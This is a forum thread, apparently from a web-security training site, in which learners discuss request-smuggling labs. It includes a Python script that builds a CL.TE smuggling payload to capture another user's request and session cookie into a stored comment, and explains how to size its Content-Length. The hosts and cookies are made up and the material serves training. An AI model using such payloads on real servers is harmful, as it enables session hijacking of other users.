New lab: Exploiting HTTP request smuggling to capture other users' requests
Hi and sorry for bothering again.
I am not able to complete the lab named in the subject line after following the lab solution.
As far as I understand, there should be "another user" accessing the blog comments page, whose session cookie should be captured thanks to my previous "smuggled" request.
I wait for several minutes, but when I refresh the page, the only credentials that are captured are mine. I send my smuggled request only once, and not twice as in the other exercises, since I understand that the second request is the one from the other user (the "bot").
Is this correct?
Thank you in advance,
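The mechanism the question is about can be modelled offline. The following is an added example written for this thread, not code from the lab or from PortSwigger: it simulates a CL.TE desync in which the front-end honours Content-Length and the back-end honours Transfer-Encoding, and shows that one smuggled POST is enough to swallow whichever request the front-end forwards next on that back-end connection, with the smuggled Content-Length deciding how much of it lands in the comment. The host, the /post/comment endpoint, the form field names, the victim request and the cookie values are all made up for the illustration.

```python
"""Model of a CL.TE request-smuggling capture (illustration only).

Hypothetical host, paths, form fields and cookies; the victim request is
constructed, not captured from a real system.
"""
from typing import Optional

CRLF = b"\r\n"
HOST = b"vulnerable-website.com"  # hypothetical host
# Hypothetical form prefix; the victim's bytes land after "comment=".
COMMENT_PREFIX = b"csrf=csrf123&postId=1&name=Carlos&email=c%40x.com&website=&comment="
# Constructed victim request that the front-end forwards next on the same connection.
VICTIM_REQUEST = (b"GET /my-account HTTP/1.1" + CRLF
                  + b"Host: " + HOST + CRLF
                  + b"Cookie: session=VICTIMSESSION" + CRLF + CRLF)


def build_attack(capture_len: int) -> bytes:
    """Outer request is complete for a Content-Length parser; a chunked parser
    stops at the 0-chunk and treats the rest as a new (smuggled) request whose
    Content-Length exceeds the body actually sent, so it keeps reading."""
    smuggled = (b"POST /post/comment HTTP/1.1" + CRLF
                + b"Host: " + HOST + CRLF
                + b"Cookie: session=ATTACKERSESSION" + CRLF
                + b"Content-Type: application/x-www-form-urlencoded" + CRLF
                + b"Content-Length: " + str(capture_len).encode() + CRLF
                + CRLF + COMMENT_PREFIX)
    outer_body = b"0" + CRLF + CRLF + smuggled
    return (b"POST / HTTP/1.1" + CRLF
            + b"Host: " + HOST + CRLF
            + b"Content-Type: application/x-www-form-urlencoded" + CRLF
            + b"Content-Length: " + str(len(outer_body)).encode() + CRLF
            + b"Transfer-Encoding: chunked" + CRLF
            + CRLF + outer_body)


def _read_chunked(stream: bytes, pos: int):
    """Decode a chunked body; return (body, next_pos) or None if incomplete."""
    body = b""
    while True:
        eol = stream.find(CRLF, pos)
        if eol < 0:
            return None
        size = int(stream[pos:eol].split(b";")[0], 16)
        pos = eol + 2
        if size == 0:
            while True:  # skip trailer lines up to the empty line
                eol = stream.find(CRLF, pos)
                if eol < 0:
                    return None
                if eol == pos:
                    return body, pos + 2
                pos = eol + 2
        if len(stream) < pos + size + 2:
            return None
        body += stream[pos:pos + size]
        pos += size + 2


def parse_requests(stream: bytes, prefer: str) -> list:
    """Split one connection's bytes into (request_line, body) pairs.
    prefer='cl' models the front-end (Content-Length wins); prefer='te' models
    the back-end (Transfer-Encoding wins). Stops at an incomplete request,
    i.e. where a real server would block waiting for more bytes."""
    out = []
    pos = 0
    while pos < len(stream):
        hdr_end = stream.find(CRLF + CRLF, pos)
        if hdr_end < 0:
            break
        lines = stream[pos:hdr_end].split(CRLF)
        headers = {}
        for ln in lines[1:]:
            k, _, v = ln.partition(b":")
            headers[k.strip().lower()] = v.strip()
        body_start = hdr_end + 4
        chunked = headers.get(b"transfer-encoding", b"").lower() == b"chunked"
        if chunked and prefer == "te":
            res = _read_chunked(stream, body_start)
            if res is None:
                break
            body, pos = res
        else:
            n = int(headers.get(b"content-length", b"0"))
            if len(stream) - body_start < n:
                break
            body = stream[body_start:body_start + n]
            pos = body_start + n
        out.append((lines[0], body))
    return out


def captured_comment(capture_len: int) -> Optional[bytes]:
    """Victim bytes stored in the comment, or None when the smuggled
    Content-Length over-reaches and the back-end never completes the POST."""
    stream = build_attack(capture_len) + VICTIM_REQUEST
    for line, body in parse_requests(stream, prefer="te"):
        if line.startswith(b"POST /post/comment"):
            return body[len(COMMENT_PREFIX):]
    return None


if __name__ == "__main__":
    print(captured_comment(100))   # cut off before the Cookie header
    print(captured_comment(156))   # whole victim request, cookie included
    print(captured_comment(200))   # None: back-end waits for bytes that never come
```

Running it side by side shows the two failure modes a practitioner hits in this kind of capture: a Content-Length that is too small truncates the stored request before the Cookie header, and one that is too large leaves the back-end waiting for the rest of the body, so no comment is ever posted. Whichever request the front-end forwards next on that back-end connection is the one absorbed, which is why the capture contains your own request if you browse the site yourself before another user does.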
Thanks for letting us know, Luca.
I cannot find a way to get an API key different from the one that is already accessible with the given user, and that key is not accepted as the solution for the lab.
I'm not entirely sure which key I am supposed to retrieve, another bot's?
Can you please help me with this last lab?
I had a lot more problems solving the "Exploiting HTTP request smuggling to capture other users' requests" lab and only figured out what I was doing wrong after 3-4 days of trying.
Now, how do I check the static resources? I tried using the Chrome Inspect tool and checking the resources folder, but they just look the same every time. Is that the right way to check the .js static resources?
Do I have to be logged in as carlos when I refresh the home page in an incognito browser?